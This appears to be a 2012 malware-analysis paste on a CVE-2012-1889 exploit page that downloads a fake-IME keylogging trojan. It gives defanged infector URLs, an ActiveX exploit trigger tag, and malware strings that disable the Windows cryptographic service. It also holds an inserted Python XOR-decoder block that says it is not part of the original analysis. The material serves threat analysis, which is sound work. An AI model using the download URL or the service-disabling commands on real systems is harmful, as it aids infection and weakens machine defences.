unixfreaxjp

Chinese ExploitKit/CVE-2012-1889| FakeIME InfoStealer Trojan

Sep 29th, 2012
* * Chinese ExploitKit/CVE-2012-1889| FakeIME InfoStealer Trojan * *
================================
CHINESE FAKE IME INFECTIONS
STARTING FAKE NET SERVICE
STARTING CRYPTER SERVICE
INFO STEALER
Found/analysis:
#MalwareMustDie / @unixfreaxjp
================================
-----------
Infector IP:
-----------
IP: 222.73.57.117
inetnum: 222.64.0.0 - 222.73.255.255
netname: CHINANET-SH
descr: CHINANET shanghai province network
descr: China Telecom
descr: No1,jin-rong Street
descr: Beijing 100032
country: CN
-----------
Info:
-----------
person: Wu Xiao Li
address: Room 805,61 North Si Chuan Road,Shanghai,200085,PRC
country: CN
phone: +86-21-63630562
fax-no: +86-21-63630566
e-mail: ip-admin@mail.online.sh.cn
nic-hdl: XI5-AP
mnt-by: MAINT-CHINANET-SH
changed: ip-admin@mail.online.sh.cn 20010510
source: APNIC
-----------
Infector urls:
-----------

======================
ANALYSIS
======================
--02:53:10-- h00p://9be14ngfsd.pppdiy.com/jx/xop.html
=> `xop.html'
Resolving 9be14ngfsd.pppdiy.com... 222.73.57.117
Connecting to 9be14ngfsd.pppdiy.com|222.73.57.117|:80... connected.
h00p request sent, awaiting response... 200 OK
Length: 9,950 (9.7K) [text/html]
02:53:15 (2.74 KB/s) - `xop.html' saved [9950/9950]

-----------------------------

[h00p] URL: h00p://9be14ngfsd.pppdiy.com/jx/xop.html (Status: 200, Referrer: None)
// ActiveX : f6d90f11-9c73-11d3-b32e-00c04f990bb4 Dropped..
<object classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" id="vwtI"></object>
<meta content="IE=7" h00p-equiv="X-UA-Compatible"/>
------------shellcode executed (CVE-2012-1889)------------------


↑ XOR-decoded the shellcode above and found h00p://222.73.57.117/exe/jx.exe // download path found;
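The download URL above was recovered by XOR-decoding the shellcode. As an added example, not part of the original analysis, the Python below reproduces that step generically: it parses a pasted hex dump (skipping inline comments), guesses the single-byte key from the padding (null bytes in shellcode come out of the XOR as long runs of the key byte), then brute-forces all 256 keys for an embedded URL and defangs what it finds. The dump it runs on is constructed here from a documentation-range placeholder address; it is not the real sample or the real infector address.

```python
import re
from collections import Counter

# Constructed sample (NOT the real shellcode): a placeholder download URL
# hidden behind single-byte XOR and padded with nulls, as shellcode usually is.
# 198.51.100.10 is a documentation-range address, not a real infector.
_BUILD_KEY = 0xBD
_PLAIN = b"\xeb\x10" + b"http://198.51.100.10/exe/sample.exe" + b"\x00" * 24
SAMPLE_DUMP = " ".join(f"{b ^ _BUILD_KEY:02x}" for b in _PLAIN) + " // CVE-2012-1889"

URL_RE = re.compile(rb"https?://[\x21-\x7e]+")


def parse_hex_dump(text):
    """Turn a whitespace-separated hex dump, as pasted in analysis notes with
    '//' comments and all, into bytes; every token that is not a hex pair is skipped."""
    return bytes(int(t, 16) for t in text.split() if re.fullmatch(r"[0-9a-fA-F]{2}", t))


def xor_with_key(data, key):
    return bytes(b ^ key for b in data)


def guess_key_from_padding(data):
    """Shellcode carries long runs of null bytes; after a single-byte XOR those
    become runs of the key itself, so the most frequent byte is a good first guess."""
    return Counter(data).most_common(1)[0][0]


def find_xor_urls(data):
    """Brute-force every single-byte key; return {key: [urls]} for the keys
    under which a URL-looking string appears in the decoded bytes."""
    hits = {}
    for key in range(256):
        urls = URL_RE.findall(xor_with_key(data, key))
        if urls:
            hits[key] = [u.decode("ascii") for u in urls]
    return hits


def defang(url):
    """Defang a recovered indicator for reporting so it is not clickable."""
    return url.replace("http", "hxxp").replace(".", "[.]")


if __name__ == "__main__":
    data = parse_hex_dump(SAMPLE_DUMP)
    print("guessed key from padding: 0x%02x" % guess_key_from_padding(data))
    for key, urls in find_xor_urls(data).items():
        print("key 0x%02x -> %s" % (key, ", ".join(defang(u) for u in urls)))
```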


-------------------------------
--03:01:26-- h00p://222.73.57.117/exe/jx.exe <===== TROJAN FAKE IME KEYLOGGING....
=> `jx.exe'
Connecting to 222.73.57.117:80... connected.
h00p request sent, awaiting response... 200 OK
Length: 48,128 (47K) [application/octet-stream]
------------------------------------

Sections:
Name VirtAddr VirtSize RawSize
UPX0 0x1000 0x7000 0 <<<<<<< PACKED!!
UPX1 0x8000 0xc000 46592 <<<<<<< PACKED!!
UPX2 0x14000 0x1000 512 <<<<<<< PACKED!!


// unpacking.....
UPX 3.07 Markus Oberhumer, Laszlo Molnar & John Reiser Sep 08th 2010
File size Ratio Format Name
------------------ ------ ----------- -----------
58880 <- 48128 81.74% win32/pe sample
Unpacked 1 file.

-------bin analysis------

Fail CRC: Claimed: 0 Actual: 60344
Fail Compile Time: 2033-11-12 07:06:07
Compiler: Microsoft Visual C++ v6.0

// strange...
0x40402c CreateToolhelp32Snapshot
0x404054 Process32First
0x404080 Process32Next

// Renaming itself....
call sub_40161C
call sub_401693
mov ebx, offset aJx3client_exe ; "JX3Client.exe"


--------------traces---------

// Malware OP traces...

000000002FE6 0000004047E6 0 MoveFileA
000000003032 000000404832 0 WriteFile
00000000303E 00000040483E 0 CreateFileA
00000000304C 00000040484C 0 WinExec
000000003074 000000404874 0 CopyFileA

// keystroke controlling...

0000000030C0 0000004048C0 0 GetKeyboardLayoutList
0000000030D8 0000004048D8 0 GetKeyboardLayoutNameA
0000000030F2 0000004048F2 0 ActivateKeyboardLayout
00000000310C 00000040490C 0 GetKeyboardLayout
000000003120 000000404920 0 LoadKeyboardLayoutA
000000003136 000000404936 0 UnloadKeyboardLayout

// IME traces...

IMM32.dll.ImmGetDescriptionA Hint[0]
IMM32.dll.ImmInstallIMEA Hint[0]
IMM32.dll.ImmIsIME Hint[0]

// temp OPS data

00000000380C 00000040520C 0 %c:\Recycled\%d.tmp
000000003820 000000405220 0 %c:\RECYCLER\%d.tmp

// Crypter service..
00000000E05C 00000040FA5C 0 sc delete cryptsvc
00000000E070 00000040FA70 0 sc config cryptsvc start= disabled
00000000E094 00000040FA94 0 net stop cryptsvc

// registry added traces

00000000E0A8 00000040FAA8 0 %s%s%d.dll // kbdus.dll
00000000E0DC 00000040FADC 0 SOFTWARE\kingsoft\JX3\zhcn
00000000E0F8 00000040FAF8 0 JX3Client // JX3Client.exe
00000000E104 00000040FB04 0 Software\Microsoft\Windows\ShellNoRoam\MUICache
00000000E134 00000040FB34 0 %sdllcache\%s
00000000E144 00000040FB44 0 %syu%s //


// Drops
C:\WINDOWS\system32\chinasougou.ime
C:\WINDOWS\system32\yumidimap.dll
C:\WINDOWS\system32\net1.exe


// Malware service...
Filename: net1.exe
MD5: 3f14c041342e3fba343f2a1d11e74bba
SHA-1: 4221467faee4926d692bd5ae71cf0a37f326bf42
File Size: 124928 Bytes
Command Line: net1 stop cryptsvc

// Crypter Service:
Filename: sc.exe
MD5: a48b1c06219a01a60cd8d4d45440bde9
SHA-1: 34af23607ad5afa9e61b6a96cec811e6bdc50b4a
File Size: 31232 Bytes
Command Line: sc config cryptsvc start= disabled

------------------------------------------------------
VIRUS TOTAL CHECKS
-----------------------------------------------------
First Check in VT: (PACKED/ORIGINAL)
https://www.virustotal.com/file/62f1707394325b5c3ac09df8e362b9a0710fbc956b3327f419063e24182c1e5b/analysis/1348946206/
McAfee : Artemis!BBFC347F66C1
K7AntiVirus : Riskware
TheHacker : Posible_Worm32
F-Prot : W32/Heuristic-114!Eldorado
ESET-NOD32 : a variant of Win32/PSW.OnLineGames.QBF
TrendMicro-HouseCall : TROJ_GEN.RCBCEHF
Kaspersky : HEUR:Trojan.Win32.Generic
F-Secure : Dropped:Trojan.PWS.FakeIME.B
VIPRE : Trojan.Win32.Generic!BT
AntiVir : TR/ATRAPS.Gen
TrendMicro : TROJ_GEN.RCBCEHF
McAfee-GW-Edition : Artemis!BBFC347F66C1
Jiangmin : Trojan/Generic.algbo
Microsoft : PWS:Win32/Lolyda.BF
Commtouch : W32/Heuristic-114!Eldorado
AhnLab-V3 : Trojan/Win32.Xema
VBA32 : TrojanPSW.QQTen.ng
PCTools : Trojan.Gen
Ikarus : Trojan-PWS.Win32.Lolyda
Fortinet : W32/Onlinegames.QBF!tr
AVG : unknown virus Win32/DH{HhM6SEVn}
Panda : Suspicious file
---------------------------------------------------------------------
First Check in VT: (UNPACKED)
https://www.virustotal.com/file/f63345d3adc06ca20aafe0e9ab4b0a2c47f4dcff71b0d696dd8ae8412626fe4c/analysis/1348946229/

F-Secure : Dropped:Trojan.PWS.FakeIME.B
DrWeb : BackDoor.PcClient.5930
GData : Dropped:Trojan.PWS.FakeIME.B
Symantec : Suspicious.Cloud.5
Norman : W32/OnLineGames.NVOE
ESET-NOD32 : a variant of Win32/PSW.OnLineGames.QBF
eScan : Dropped:Trojan.PWS.FakeIME.B
Fortinet : W32/Onlinegames.QBF!tr
Emsisoft : Trojan-PWS.Win32.Lolyda!IK
VBA32 : TrojanPSW.QQTen.ng
Kaspersky : HEUR:Trojan.Win32.Generic
Jiangmin : Trojan/Generic.algbo
Rising : Trojan.Win32.Fednu.uhc
Ikarus : Trojan-PWS.Win32.Lolyda
AntiVir : TR/Crypt.ZPACK.Gen
AVG : unknown virus Win32/DH{HhM6SEVn}
Panda : Suspicious file
ViRobot : Trojan.Win32.A.PSW-Frethoq.51200
Comodo : TrojWare.Win32.Poison.QBF

INFECTOR: XOP.HTML
https://www.virustotal.com/file/c9b661491464aecd75cee4bc205d3076829b1b4c9915e2999d15d2a89536f421/analysis/1348946760/

eScan : Exploit.CVE-2012-1889.Gen
nProtect : Exploit.CVE-2012-1889.Gen
CAT-QuickHeal : Exploit.CVE.2012.1889
McAfee : Exploit-CVE2012-1889
K7AntiVirus : Exploit
F-Prot : JS/CVE-1889
Norman : ShellCode.AA
TotalDefense : JS/Tnega.VKD
Avast : JS:CVE-2012-1889 [Expl]
eSafe : JS.ShellCode.Aurora
ClamAV : Exploit.CVE_2012_1889-6
Kaspersky : HEUR:Exploit.Script.Generic
BitDefender : Exploit.CVE-2012-1889.Gen
Sophos : Mal/JSShell-B
Comodo : TestSignature.JS.Agent.SH
F-Secure : Exploit:JS/CVE-2012-1889.A
DrWeb : Exploit.CVE2012-1889
VIPRE : Exploit.HTML.CVE-2012-1889 (v)
AntiVir : Exp/JS.Shellcode.H
McAfee-GW-Edition : Heuristic.BehavesLike.JS.Unwanted
Emsisoft : Trojan.Script!IK
ESET-NOD32 : JS/Exploit.Shellcode.A.gen
Microsoft : Exploit:JS/ShellCode.AT
GData : Exploit.CVE-2012-1889.Gen
Commtouch : JS/CVE-1889
AhnLab-V3 : JS/Agent
Ikarus : Trojan.Script
AVG : Exploit


====================================
MALWARE MUST DIE!!!
#MalwareMustDie
Sept 29 2012 / @unixfreaxjp
===================================